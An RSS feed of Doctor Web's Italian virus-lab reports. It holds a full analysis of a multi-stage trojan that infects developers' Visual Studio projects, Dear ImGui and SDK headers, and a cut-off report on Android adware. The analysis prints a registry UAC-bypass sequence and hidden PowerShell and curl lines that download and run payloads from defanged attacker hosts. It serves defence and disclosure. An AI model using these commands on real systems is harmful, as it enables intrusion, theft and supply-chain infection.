<?xml version="1.0"?>
<rss version="2.0"><channel><title>Sui virus</title><link>https://news.drweb-av.it/news/</link><description>Notizie della società Doctor Web - Sui virus</description><image><url>https://st.drweb.com/static/drweb_logo_it.gif</url><link>https://news.drweb-av.it/news/</link><title>Antivirus Dr.Web</title></image><item><guid>https://news.drweb-av.it/show/?i=15276&amp;lng=it</guid><title>L'obiettivo sono gli sviluppatori. Un nuovo trojan attacca le catene di fornitura e causa danni combinati ai PC infetti</title><link>https://news.drweb-av.it/show/?i=15276&amp;lng=it&amp;c=9</link><pubDate>Fri, 10 Jul 2026 05:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Gli specialisti del laboratorio antivirus hanno analizzato un nuovo programma trojan. È una minaccia di tipo supply chain attack, cioè attacco alle catene di fornitura. Un tratto distintivo di questo malware è il suo focus sui progetti creati nel linguaggio di programmazione C++ e C#. Un'altra caratteristica è la sua elevata pericolosità. Il trojan unisce in sé diversi fattori distruttivi svolgendo contemporaneamente più funzioni: quelle di stealer, clipper, backdoor, cryptominer e fonte di infezione di file.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;I primi casi di diffusione del trojan sono stati registrati nell'ultimo trimestre del 2025, da allora in poi esso viene costantemente modificato dai relativi sviluppatori. Viene distribuito principalmente su internet tramite file infetti .exe e python. Il processo di infezione è a più fasi, di seguito analizziamo lo svolgimento di ciascuna fase e i rispettivi obiettivi.&lt;/p&gt;&lt;h3&gt;Fase 1. Trojan.DownLoader49.35384&lt;/h3&gt;&lt;p&gt;Gli specialisti Doctor Web hanno rilevato numerose applicazioni legittime infette con una struttura simile. Un oggetto globale è aggiunto al file eseguibile originale, e l'esecuzione dell'applicazione trojanizzata inizia con l'ottenimento dell'accesso alle API di sistema tramite il metodo PEB walking. Quindi la funzione standard initterm scorre la tabella dei puntatori a funzione e li inizializza, dove una di tali funzioni è malevola e lancia il comando PowerShell. In alcune versioni del trojan questo payload è conservato in forma crittografata.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/1_VIR-DevRunTime-220526-1613-12.pdf-image-000.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/1_VIR-DevRunTime-220526-1613-12.pdf-image-000.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Avvio tramite initterm&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Il comando PowerShell scarica ed esegue il file malevolo&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.DownLoader49.35687&amp;lng=it"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;, il che significa che viene lanciata la seconda fase.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/2_VIR-DevRunTime-220526-1613-12.pdf-image-002.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/2_VIR-DevRunTime-220526-1613-12.pdf-image-002.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Comando PowerShell malevolo&lt;/i&gt;&lt;/p&gt;&lt;p&gt;In aggiunta ai file eseguibili, sono stati rilevati file in linguaggio Python (&lt;strong&gt;Python.Downloader.255&lt;/strong&gt;). In questi ultimi il codice malevolo era cifrato tramite il meccanismo di crittografia simmetrica Fernet. È celato tramite un semplice offuscamento — una sequenza di spazi nella prima riga. Anche in questo caso l'esecuzione avviene a più fasi.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/3_VIR-DevRunTime-220526-1613-12.pdf-image-004.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/3_VIR-DevRunTime-220526-1613-12.pdf-image-004.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;File Python malevoli&lt;/i&gt;&lt;/p&gt;&lt;h3&gt;Fase 2. Trojan.DownLoader49.35687&lt;/h3&gt;&lt;p&gt;In questa fase il trojan&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.DownLoader49.35687&amp;lng=it"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;&amp;nbsp;esegue il controllo della propria esecuzione in sandbox. Oltre a ciò, crea un oggetto di sincronizzazione mutex con il nome Global\PFNMX(valore fisso). Esempio di un simile oggetto: &lt;span class="string"&gt;\Sessions\1\BaseNamedObjects\Global\PFNMX_0o6u9MMc2QdKvqeHmgPRE008&lt;/span&gt;. In questo modo il trojan controlla se sul computer è già in esecuzione un'altra copia.&lt;/p&gt;&lt;p&gt;Durante la seconda fase, il trojan cerca di ottenere gli indirizzi del server C2 utilizzando i repository pubblici GitHub e della piattaforma di gioco Steam. Su di essi i malintenzionati lasciano domini che il trojan legge e utilizza come gli URL per scaricare la terza fase — il trojan &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;Gli account Steam creati dai malintenzionati contengono un nome di dominio in chiaro.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/4_VIR-DevRunTime-220526-1613-12.pdf-image-006.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/4_VIR-DevRunTime-220526-1613-12.pdf-image-006.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Account Steam con un dominio C2&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Su GitHub i malintenzionati hanno salvato un indirizzo cifrato di un dominio C2 sotto forma di un file raw: &lt;span class="string"&gt;raw[.]githubusercontent[.]com/XxXloverXxX/rustflare/refs/heads/main/crates/engine&lt;/span&gt;. Il trojan scarica questo file e lo decodifica prima tramite Base64, e quindi tramite l'operazione XOR con la chiave ZwFlushKey.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/5_VIR-DevRunTime-220526-1613-12.pdf-image-008.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/5_VIR-DevRunTime-220526-1613-12.pdf-image-008.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Domini crittografati&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Dopo aver scaricato la fase successiva,&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.DownLoader49.35687&amp;lng=it"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;&amp;nbsp;la incorpora nel processo di uno dei 41 file eseguibili previamente specificati da &lt;span class="string"&gt;C:\Windows\System32&lt;/span&gt;.&lt;/p&gt;&lt;p&gt;Il trojan aggiunge l'indirizzo del dominio C2 a cui ha potuto stabilire una connessione alle stringhe trascritte nel suo codice sorgente e lo passa alla fase successiva tramite il named pipe pipe\VccFramework.&lt;/p&gt;&lt;h3&gt;Fase 3. BackDoor.Siggen2.5906&lt;/h3&gt;&lt;p&gt;La principale attività malevola si verifica in questa fase. &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; crea un oggetto di sincronizzazione mutex con un nome fisso di tipo Global\PFNX_Side(valore fisso). Quindi, attraverso il canale precedentemente creato, il trojan ottiene i dati dalla seconda fase, dai quali estrae gli identificatori del trojan e il dominio C2 con cui &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; comunicherà.&lt;/p&gt;&lt;p&gt;Per guadagnare persistenza nel sistema, il trojan scarica il file "bungee.boo", che svolge le funzioni di fase 2, ovvero&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.DownLoader49.35687&amp;lng=it"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;, e sostituisce con quest'ultimo i file DLL:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;"profapi.dll" dell'applicazione Discord,&lt;/li&gt;&lt;li&gt;"domain_actions.dll" nella cartella "Domain Actions" e "well_known_domains.dll" nella cartella "Well Known Domains" dell'applicazione Microsoft Edge,&lt;/li&gt;&lt;li&gt;"C:\Windows\omadmapi.dll".&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Inoltre, &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; può alterare il registro di sistema di Windows in modo tale che all'apertura dei file compressi tramite WinRar.exe venga eseguito il codice malevolo.&lt;/p&gt;&lt;p&gt;Per le azioni con i permessi amministratore, il trojan utilizza una tecnica di aggiramento dell'UAC. Il malware genera un file .vbs con un nome composto da cifre casuali, in cui lascia il comando per l'esecuzione con i permessi amministratore. Quindi tramite cmd.exe vengono avviati i comandi:&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe
%APPDATA%\Microsoft\369059.vbs" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
c start /B ComputerDefaults.exe
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In seguito, il trojan svolge 5 funzioni malevole: quelle di stealer, clipper, backdoor, cryptominer e fonte di infezione di file.&lt;/p&gt;&lt;h3&gt;Stealer&lt;/h3&gt;&lt;p&gt;Il Trojan è in grado di rubare varie informazioni:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;i tocken Discord, che consentono di accedere agli account altrui senza inserire il login/la password;&lt;/li&gt;&lt;li&gt;le password e i cookie dai browser Chrome, Edge, Opera, Brave, Yandex ecc. Oltre alle solite tecniche di estrazione dei dati, esso può utilizzare il file CCCWF.tmp (&lt;strong&gt;Trojan.PWS.Siggen5.33623&lt;/strong&gt;). Si incorpora nel browser, e quindi legge le password e le salva in file di testo;&lt;/li&gt;&lt;li&gt;le cartelle di Telegram Desktop;&lt;/li&gt;&lt;li&gt;le cartelle del portafoglio crittografico Exodus.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Oltre a rubare le cartelle Exodus, il trojan esegue la modificazione del portafoglio crittografico. Per fare questo, esso trova il file app.asar e lo sostituisce con una copia scaricata dall'URL &lt;span class="string"&gt;balista[.]lol/Stb/PokerFace/RTApp[.]txt&lt;/span&gt; tramite curl. Nella versione furtivamente sostituita in index.js (&lt;strong&gt;Trojan.Siggen32.44702&lt;/strong&gt;) si trova la funzione unlock(), la quale all'esecuzione invia le frasi mnemoniche del portafoglio crypto al server dei malintenzionati.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/6_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-016.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/6_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-016.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;File index.js furtivamente sostituito&lt;/i&gt;&lt;/p&gt;&lt;h3&gt;Clipper&lt;/h3&gt;&lt;p&gt;È una funzione particolarmente pericolosa del trojan. Il malware monitora costantemente gli appunti dell'utente: cerca i dati di carte bancarie e li invia al server dei malintenzionati. Inoltre, il programma malevolo sostituisce gli indirizzi di portafogli crypto con quelli fraudolenti, i quali ottiene dal server C2.&lt;/p&gt;&lt;h3&gt;Backdoor&lt;/h3&gt;&lt;p&gt;Le funzionalità del trojan consentono ai malintenzionati di gestire il PC infetto in remoto mediante i comandi:&lt;/p&gt;&lt;div class="table-news-secondary"&gt;&lt;figure class="table"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;exc&lt;/td&gt;&lt;td&gt;scarica un file da un url tramite curl ed eseguilo&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;RVRS&lt;/td&gt;&lt;td&gt;avvia un Reverse Proxy&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;RUNCMD&lt;/td&gt;&lt;td&gt;avvia un comando tramite cmd&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;GETFILE&lt;/td&gt;&lt;td&gt;carica il contenuto di un determinato file sul server di comando e controllo&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;LISTDIR&lt;/td&gt;&lt;td&gt;invia la lista dei file da una determinata directory del computer al server di comando e controllo&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;TROLL&lt;/td&gt;&lt;td&gt;esegui il comando per il trolling dell'utente, esistono le opzioni earrape, scary_sound, rickroll, mute_audio, jumpscare_screamer ecc.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/div&gt;&lt;h3&gt;Cryptominer&lt;/h3&gt;&lt;p&gt;Tramite curl, il trojan scarica dal server e avvia il file &lt;span class="string"&gt;https://files[.]catbox[.]moe/lvh9j3[.]bin&lt;/span&gt;&amp;nbsp;— &lt;strong&gt;Trojan.Packed2.50953&lt;/strong&gt;. La sua struttura e le sue azioni sono simili a quelle della fase 2, ma, invece di &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt;, esso scarica e incorpora &lt;strong&gt;Trojan.BtcMine.3956&lt;/strong&gt;. Questo cryptominer si avvia solo dopo un determinato periodo di inattività dell'utente. Il malware utilizza gli strumenti &lt;a href="https://github.com/xmrig/xmrig" target="_blank" rel="noopener"&gt;XMRig&lt;/a&gt;, &lt;a href="https://github.com/trexminer/T-Rex" target="_blank" rel="noopener"&gt;T-Rex&lt;/a&gt; e &lt;a href="https://github.com/todxx/teamredminer/releases" target="_blank" rel="noopener"&gt;TeamRedMiner &lt;/a&gt;a codice sorgente aperto.&lt;/p&gt;&lt;h3&gt;Infezione di file&lt;/h3&gt;&lt;p&gt;Il principale tratto distintivo di questo trojan sono l'infezione di file e l'ulteriore propagazione autonoma. La lista dei file che vengono infettati:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;imgui_impl_win32.cpp,&lt;/li&gt;&lt;li&gt;.suo,&lt;/li&gt;&lt;li&gt;.exe,&lt;/li&gt;&lt;li&gt;winnetwk.h (Windows SDK),&lt;/li&gt;&lt;li&gt;.vcxproj e .csproj.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Per determinare i percorsi dei file che possono essere infettati, il trojan scansiona sequenzialmente i dischi e avvia il comando. Esempio per il disco A://&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj &amp;gt; %ALLUSERSPROFILE%\ADat.bin3290.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I malintenzionati contano su quello che gli sviluppatori pubblicheranno i loro progetti con codice malevolo in accesso aperto. Altri sviluppatori, che assembleranno, compileranno o modificheranno il progetto, infetteranno automaticamente i propri computer a causa dei file .suo, .vcxproj e .csproj, mentre gli utenti comuni potranno avviare i file eseguibili infetti, creati tramite gli strumenti di sviluppo compromessi.&lt;/p&gt;&lt;h3&gt;File imgui_impl_win32.cpp. Trojan.Loader.3129&lt;/h3&gt;&lt;p&gt;Il file imgui_impl_win32.cpp è parte della popolare libreria Dear ImGui, responsabile dell'interfaccia grafica del linguaggio di programmazione C++. Il trojan incorpora nel file due stringhe: la prima contiene il payload, la seconda lo lancia.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/7_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-002.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/7_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-002.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Stringa di codice con il payload&lt;/i&gt;&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/8_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-004.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/8_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-004.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Stringa di codice con l'avvio del payload&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Il risultato è il comando&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;
start /min cmd.exe /c powershell -WindowStyle Hidden -Command "&amp;amp; { iwr -Uri 'https://exo-api[.]tf/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt' -OutFile $env:APPDATA\BK879002.exe; Start-Process -FilePath $env:APPDATA\BK879002.exe -WindowStyle Hidden }" 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Pertanto, la libreria viene infettata, e qualsiasi applicazione in C++ creata dall'utente conterrà in sé codice malevolo. Con il trasferimento o caricamento delle simili applicazioni, l'infezione si diffonderà ulteriormente.&lt;/p&gt;&lt;h3&gt;File .suo. Trojan.Loader.3138&lt;/h3&gt;&lt;p&gt;È un'estensione dei file dell'ambiente di sviluppo Microsoft Visual Studio. In questi file sono conservate le impostazioni dell'utente per determinati progetti. Il trojan sostituisce il file originale con quello infetto, ottenuto dal C2.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/9_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-006.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/9_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-006.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;File infetto&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Come risultato, all'apertura del progetto in Visual Studio viene avviato il codice malevolo:&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;
javascript:new ActiveXObject('WScript.Shell').Run('cmd /b /c curl -o \"C:\\ProgramData\\S47LY.exe\" \"https://pee-files[.]nl/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt\" &amp;amp;&amp;amp; start \"\" \"C:\\ProgramData\\S47LY.exe\"', 0, false);close();
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3&gt;File winnetwk.h. Trojan.Loader.3184&lt;/h3&gt;&lt;p&gt;Windows SDK è un set di strumenti ufficiale di Microsoft che consente di creare applicazioni per SO Windows.&lt;/p&gt;&lt;p&gt;Tramite il registro, il trojan trova la cartella in cui è installato Windows SDK. In questa cartella avviene la ricerca del file &lt;span class="string"&gt;winnetwk.h&lt;/span&gt;, responsabile dell'interazione con le risorse di rete. Quindi ad esso viene aggiunto il codice malevolo.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/10_VIR-DevRunTime-220526-1613-12.pdf-image-010.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/10_VIR-DevRunTime-220526-1613-12.pdf-image-010.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;File winnetwk.h infetto&lt;/i&gt;&lt;/p&gt;&lt;p&gt;A seguito di questo, tutti i programmi creati con l'utilizzo di winnetwk.h avranno il codice malevolo, il quale avvia la fase 2.&lt;/p&gt;&lt;h3&gt;File .exe&lt;/h3&gt;&lt;p&gt;Il trojan cerca i file .exe adatti e incorpora in essi le funzioni di inizializzazione delle API e di avvio di initterm. Quindi il file inizia a funzionare come&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.DownLoader49.35384&amp;lng=it"&gt;&lt;b&gt;Trojan.DownLoader49.35384&lt;/b&gt;&lt;/a&gt;, ovvero la fase 1.&lt;/p&gt;&lt;h3&gt;File .vcxproj (Trojan.Loader.3128, Trojan.Loader.3127) e .csproj (Trojan.Loader.3126)&lt;/h3&gt;&lt;p&gt;Sono file dei progetti Visual Studio nei linguaggi di programmazione C++ e C#. Ad essi viene aggiunto il comando PreBuildEvent, che viene eseguito prima di ciascun assemblaggio di un progetto. Le prime versioni del trojan aggiungevano un codice simile alla fase 1.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/11_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-012.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/11_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-012.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Una prima versione di codice&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Nelle nuove versioni il codice è diventato più complesso, è comparso un ulteriore offuscamento.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/12_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-014.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/12_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-014.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Una nuova versione di codice&lt;/i&gt;&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/13_Clipboard-28_мая_2026_г_15_07_16.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/13_Clipboard-28_мая_2026_г_15_07_16.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Una delle fasi di esecuzione di &lt;strong&gt;Trojan.Loader.3128&lt;/strong&gt;&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Come risultato dell'esecuzione del comando malevolo, viene scritto un file .vbs malevolo, il quale, a sua volta, avvia PowerShell payload. Il trojan effettua una richiesta agli indirizzi URL:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;youtu.be/akoxddx6lgc,&lt;/li&gt;&lt;li&gt;steamcommunity.com/profiles/76561198737324192.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Su questi indirizzi è conservato un altro indirizzo URL crittografato tramite base64.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/14_VIR-DevRunTime-220526-1613-12.pdf-image-012.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/14_VIR-DevRunTime-220526-1613-12.pdf-image-012.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Account YouTube con un indirizzo URL crittografato&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Dopo la decodifica, il trojan ottiene un dominio C2 a cui esso si connette per ricevere il payload, che è simile alla fase 2.&lt;/p&gt;&lt;p&gt;La descrizione del funzionamento del trojan ci permette di concludere che esso rappresenta un pericolo elevato a causa della combinazione di diverse funzioni malevole. Per evitare l'infezione del proprio computer e l'ulteriore diffusione del trojan, vi consigliamo di aggiornare regolarmente i database antivirus e controllare tutti i file scaricati da internet. Gli utenti dell'antivirus Dr.Web Security Space e Dr.Web Desktop Security Suite possono essere tranquilli, in quanto il trojan viene rilevato ed eliminato in modo affidabile dagli antivirus Dr.Web. I file di tipo .vcxproj, .csproj e imgui vengono curati, da essi viene eliminato il codice malevolo.&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15262&amp;lng=it</guid><title>Trojan Android.MagicAd mostra annunci nonostante ogni restrizione</title><link>https://news.drweb-av.it/show/?i=15262&amp;lng=it&amp;c=9</link><pubDate>Fri, 05 Jun 2026 03:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Gli specialisti del laboratorio antivirus dell'azienda Doctor Web hanno rilevato un programma trojan, denominato Android.MagicAd, che con vari metodi aggira le restrizioni del sistema operativo Android e visualizza la pubblicità al funzionamento in background. Uno dei metodi è universale, gli altri sono progettati per dispositivi di produttori specifici. Includono lo sfruttamento di applicazioni di terze parti, nonché l'utilizzo del lettore multimediale di sistema.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; veniva distribuito attraverso lo store ufficiale delle app per dispositivi Xiaomi GetApps ed era nascosto in più di 50 vari giochi e programmi. Comparivano nello store per un breve periodo — il più delle volte, fino a un mese, dopodiché scomparivano, e al loro posto ne comparivano di nuovi. Probabilmente, i malintenzionati cercavano in questo modo di proteggere &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; dal rilevamento prematuro, mantenendo, allo stesso tempo, la sua attività, in quanto, dopo la rimozione dallo store, i programmi trojan rimangono sui dispositivi degli utenti e possono continuare a svolgere le operazioni malevole. Al momento, nessuna delle applicazioni con &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; da noi rilevate è disponibile per il download su GetApps, e gli sviluppatori che le distribuivano hanno smesso di pubblicare nuovi programmi con il trojan.&lt;/p&gt;

&lt;p&gt;Lo studio effettuato dagli analisti dei virus Doctor Web ha mostrato che le prime versioni di &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; sono emerse nel 2025 e, oltre allo store di app GetApps, si trovavano anche su Samsung Galaxy Store.&lt;/p&gt;

&lt;div class="img img-two"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/01_Android.MagicAd_store_1.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/01_Android.MagicAd_store_1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/02_Android.MagicAd_store_2.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/02_Android.MagicAd_store_2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Esempi di giochi e programmi dallo store di app GetApps che contenevano Android.MagicAd.1. Al momento della pubblicazione della nostra notizia, queste e altre varianti del trojan non sono più disponibili per il download&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Parte delle funzionalità malevole di &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; si trova nei moduli dex che sono nascosti in librerie native cifrate nella directory con le risorse file del trojan. Nel corso del funzionamento, il malware decifra queste librerie, ne estrae i propri componenti e li esegue.&lt;/p&gt;

&lt;p&gt;Prima di iniziare a visualizzare annunci pubblicitari, il trojan esegue una serie di controlli per assicurarsi che il suo ambiente sia sicuro. Ad esempio, cerca segni di operazione in ambiente virtuale, controlla se la sua installazione è stata organica e se l'indirizzo IP del dispositivo infettato non è presente sulla sua blacklist ecc.&lt;/p&gt;

